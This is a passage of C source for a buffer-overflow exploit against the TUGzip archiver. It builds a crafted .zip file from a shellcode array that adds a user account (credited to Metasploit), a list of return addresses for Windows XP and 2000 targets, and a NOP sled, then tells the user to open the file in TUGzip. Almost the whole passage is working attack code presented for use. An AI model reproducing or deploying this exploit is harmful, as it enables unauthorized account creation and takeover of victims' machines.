"MPNOOQa4oTkPA"; //ADD USER shellcode TNX to metasploit char shellcode_2[]= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" "\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; struct addresses { char *platform; unsigned long addr; } targets[]= { { "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf }, { "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 }, { "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B }, { "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 }, { "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 }, { "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 }, { "[*]Crash the program",0x58585858 }, {NULL } }; int main(int argc,char *argv[]) { FILE *h; char *buffer; buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2)); unsigned int offset=0; int number; unsigned int retaddress=targets[atoi(argv[2])].addr; if(argc<2) { printf("# \tChose your Platform #\n"); for(int i=0;targets[i].platform;i++) printf("%d \t\t %s\n",i,targets[i].platform); printf("\tUsage is:\n"); printf(argv[0]); printf(".exe "); printf("filename.zip "); printf("platform\n"); printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n"); system("color 02"); Sleep(2000); return 0; } if((h=fopen(argv[1],"wb"))==NULL) { printf("error\n"); exit(0); } memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1); memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET; memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP; memset(buffer+offset,0x90,20); printf("#___________________________________________________________________________#\n"); printf("Now chose your shellcode \n"); printf("Press [1] for Alphanumeric shellcode\n"); printf("Press [2] for NonAphanumeric shellcode\n"); printf("#___________________________________________________________________________#\n"); scanf("%d",&number); switch(number) { case 1: offset=shellcode_offset; memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1)); case 2: offset=shellcode_offset; memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2)); } fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h); printf("Building file ...\n"); printf("Done ! Open with TUGzip and see what happens :) \n"); printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n"); fclose(h); free(buffer); return 0; }